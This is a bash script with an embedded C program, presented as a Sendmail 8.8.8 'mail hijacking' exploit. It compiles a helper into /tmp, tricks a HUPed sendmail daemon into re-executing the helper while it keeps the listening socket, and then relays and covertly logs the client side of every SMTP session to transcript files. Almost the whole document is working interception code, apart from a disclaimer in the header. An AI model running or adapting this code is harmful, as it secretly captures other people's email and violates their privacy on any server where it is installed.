- #!/bin/bash
-
- #
- # Sendmail 8.8.8 mail hijacking
- # (c) Michal Zalewski <lcamtuf@ids.pl>
- # ------------------------------------
- # This exploit will hijack all Sendmail connections, logging
- # mail traffic to some location (/tmp by default, change to
- # something more private). Normal MTA functionality is
- # preserved - you could call it 'transparent mail traffic sniffer'.
- #
- # NOTE: usage other than for diagnostic or educational purposes
- # is simply *illegal* and villainy. Privacy is sanctity.
- #
-
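# Banner.
printf '%s\n' "---------------------------------------------" \
              "Welcome to Sendmail 8.8.8 mail hijack exploit" \
              "---------------------------------------------" ""

printf '%s\n' "* Creating files in /tmp (hopefully no 'noexec' there)..."

# test.c, the compiled helper and the session transcripts all live under /tmp,
# and the later steps refer to /tmp/test by absolute path; an unchecked cd
# would silently drop test.c into whatever the caller's cwd is.  Bail instead.
cd /tmp || { printf 'cannot cd to /tmp\n' >&2; exit 1; }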
- cat >test.c <<EOF
-
#include <errno.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <time.h>
#include <unistd.h>
-
/* Descriptor on which the listening socket is expected to already be open
 * when this program starts; accept() below reads from it directly without
 * creating or binding anything.  TODO(review): confirm the daemon that
 * re-execs us really leaves its listener at fd 4. */
#define SERV_FD 4
/* Directory in which one transcript per session, named trans-<time>-<pid>-in
 * (mode 0600), is created. */
#define DIRECTORY "/tmp"
-
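#ifndef SERV_FD
#define SERV_FD 4          /* fallback; normally defined at the top of this file */
#endif
#ifndef DIRECTORY
#define DIRECTORY "/tmp"   /* fallback; normally defined at the top of this file */
#endif

/*
 * Write all len bytes of buf to fd, continuing across short writes and
 * EINTR.  Returns 0 on success, -1 on a hard error (errno left from write()).
 * Needed because a single write() to the client socket may transfer only
 * part of the buffer; the rest would otherwise be silently dropped.
 */
static int write_all(int fd, const char *buf, size_t len) {
    while (len > 0) {
        ssize_t n = write(fd, buf, len);
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        buf += n;
        len -= (size_t)n;
    }
    return 0;
}

/*
 * Create the per-session transcript DIRECTORY/trans-<time>-<pid>-in.
 * O_EXCL and no O_TRUNC: the name is guessable and DIRECTORY defaults to the
 * shared /tmp, so never open an existing file or follow a symlink that
 * another local user may have planted under that name.  Returns the fd, or
 * -1 if the file could not be created; the session is still relayed, just
 * not logged.
 */
static int open_transcript(void) {
    char path[4096];

    snprintf(path, sizeof path, DIRECTORY "/trans-%ld-%ld-in",
             (long)time(NULL), (long)getpid());
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/*
 * Relay bytes between the client socket and the MTA child until the MTA
 * side closes.  Client->MTA bytes are also appended to log_fd (when >= 0);
 * MTA->client bytes are relayed but not logged.  Takes ownership of to_mta:
 * it is closed as soon as the client stops sending so the MTA sees EOF on
 * its stdin and finishes, and whatever the MTA still emits is delivered (or
 * drained, if the client is gone) before returning.
 */
static void relay(int csock, int to_mta, int from_mta, int log_fd) {
    char buf[4096];
    int client_open = 1, mta_open = 1;

    while (mta_open) {
        fd_set rfds;
        int maxfd = from_mta;
        ssize_t n;

        FD_ZERO(&rfds);
        FD_SET(from_mta, &rfds);
        if (client_open) {
            FD_SET(csock, &rfds);
            if (csock > maxfd)
                maxfd = csock;
        }
        if (select(maxfd + 1, &rfds, NULL, NULL, NULL) < 0) {
            if (errno == EINTR)
                continue;
            break;
        }

        if (client_open && FD_ISSET(csock, &rfds)) {
            n = read(csock, buf, sizeof buf);
            if (n > 0) {
                if (write_all(to_mta, buf, (size_t)n) < 0)
                    mta_open = 0;          /* MTA went away (EPIPE) */
                if (log_fd >= 0)
                    write_all(log_fd, buf, (size_t)n);
            } else if (n == 0 || errno != EINTR) {
                client_open = 0;
                close(to_mta);             /* EOF on the MTA's stdin */
                to_mta = -1;
            }
        }

        if (FD_ISSET(from_mta, &rfds)) {
            n = read(from_mta, buf, sizeof buf);
            if (n > 0) {
                if (client_open && write_all(csock, buf, (size_t)n) < 0) {
                    client_open = 0;       /* client gone; keep draining the MTA */
                    close(to_mta);
                    to_mta = -1;
                }
            } else if (n == 0 || errno != EINTR) {
                mta_open = 0;
            }
        }
    }
    if (to_mta >= 0)
        close(to_mta);
}

/*
 * Handle one accepted client in a freshly forked child: run "sendmail -bs"
 * on a pipe pair, relay the SMTP dialogue through relay(), then tear down.
 * Does not return.
 */
static void serve_session(int csock) {
    int to_mta[2], from_mta[2], log_fd;
    pid_t pid;

    close(SERV_FD);                 /* the listener belongs to the parent */
    if (pipe(to_mta) < 0 || pipe(from_mta) < 0)
        _exit(1);
    log_fd = open_transcript();

    pid = fork();
    if (pid == 0) {
        /* Grandchild: become the real MTA in SMTP-on-stdio mode.  Hand it
         * only stdin/stdout/stderr; the client socket, the transcript and
         * the pipe ends the relay uses must not leak into the exec'd program. */
        dup2(to_mta[0], 0);
        dup2(from_mta[1], 1);
        dup2(from_mta[1], 2);
        if (to_mta[0] > 2)
            close(to_mta[0]);
        if (from_mta[1] > 2)
            close(from_mta[1]);
        close(to_mta[1]);
        close(from_mta[0]);
        close(csock);
        if (log_fd >= 0)
            close(log_fd);
        execl("/usr/sbin/sendmail", "sendmail", "-bs", (char *)0);
        _exit(1);                   /* exec failed; nothing sensible left to do */
    }
    close(to_mta[0]);
    close(from_mta[1]);

    if (pid > 0)
        relay(csock, to_mta[1], from_mta[0], log_fd);   /* closes to_mta[1] */
    else
        close(to_mta[1]);

    if (log_fd >= 0) {
        write_all(log_fd, "\nEOF\n", 5);    /* end-of-session marker */
        close(log_fd);
    }
    close(from_mta[0]);
    shutdown(csock, 2);
    close(csock);
    _exit(0);
}

/*
 * Entry point.  Meant to be exec'd by the real daemon with the listening
 * socket still open on SERV_FD (see the shell wrapper around this file).
 * If argv[0] is not "sendmail" the program re-execs itself once with that
 * name (presumably so it is listed under the daemon's name), then accepts
 * connections forever, forking one relay child per client.
 */
int main(int argc, char *argv[]) {
    if (argc > 0 && argv[0] != NULL && strcmp("sendmail", argv[0]) != 0)
        execl(argv[0], "sendmail", "-bd", (char *)0);   /* falls through if exec fails */

    signal(SIGCHLD, SIG_IGN);   /* auto-reap relay children; no zombies */
    signal(SIGPIPE, SIG_IGN);   /* a vanished peer must surface as EPIPE, not kill us */

    for (;;) {
        struct sockaddr_in saddr;
        socklen_t alen = sizeof saddr;
        int csock = accept(SERV_FD, (struct sockaddr *)&saddr, &alen);
        pid_t pid;

        if (csock < 0) {
            /* Transient conditions are retried; anything else (EBADF,
             * ENOTSOCK, EINVAL) means SERV_FD is not a listening socket and
             * retrying would just spin the CPU forever. */
            if (errno == EINTR || errno == EAGAIN || errno == ECONNABORTED)
                continue;
            return 1;
        }
        pid = fork();
        if (pid == 0)
            serve_session(csock);   /* never returns */
        /* Parent (or failed fork): the child owns csock now; drop our copy so
         * the daemon does not leak one descriptor per connection. */
        close(csock);
    }
}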
- EOF
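printf '%s\n' "* Compiling takeover service..."

# The daemon is later told to re-exec this binary (doexec/killall below); if
# it does not exist the MTA simply dies on restart, so stop before that step.
gcc test.c -o test || { printf 'gcc failed; aborting before touching sendmail\n' >&2; exit 1; }

# Preconditions for the takeover: doexec (Red Hat initscripts) to start
# sendmail with a chosen argv[0], and root to bind port 25 and to HUP the
# running daemon.  Fail early rather than restart the MTA for nothing.
command -v doexec >/dev/null 2>&1 || { printf 'doexec not found; aborting\n' >&2; exit 1; }
[ "$(id -u)" -eq 0 ] || { printf 'must be run as root; aborting\n' >&2; exit 1; }

# Local SYN probe of port 25.  The script states no rationale for it and its
# output is discarded; kept as in the original.
nmap -p 25 -sS -P0 -n 127.0.0.1 &>/dev/null

printf '\n'
printf '%s\n' \
  "* Now, on your root box (could be your own machine), you have" \
  "  to execute following command (of course nmap is required, get" \
  "  it at www.insecure.org/nmap/). Then, you have just seconds" \
  "  to hit RETURN here, so the exploit could continue. Try to fit" \
  "  in less than 4 secs." \
  "" \
  "  Command: nmap -p 25 -sS -P0 -n $(hostname -i)" \
  ""
printf '%s' "Hit RETURN to continue... "
read -r
printf '\n'

printf '%s\n' "* Ok, time's up... Hopefully you fit in 4 seconds..."

# Start the genuine sendmail as a daemon, but with argv[0] pointing at our
# helper.  The whole trick relies on sendmail 8.8.8 restarting itself by
# exec'ing argv[0] when HUPed: the listening socket stays open, the helper
# inherits it and keeps accepting for the real MTA.  This is a persistence /
# interception technique, not a privilege escalation: it needs root here.
doexec /usr/sbin/sendmail /tmp/test -bD &

printf '%s\n' "* Wait a moment, takeover in progress..."

sleep 2
killall -HUP sendmail 2>/dev/null
sleep 3
# Once the re-exec has happened the files on disk are no longer needed.
rm -f /tmp/test /tmp/test.c

printf '%s\n' \
  "* Let's see what we have here... type some bogus commands" \
  "  and check for session transcript in choosen directory..." \
  ""

telnet 127.0.0.1 25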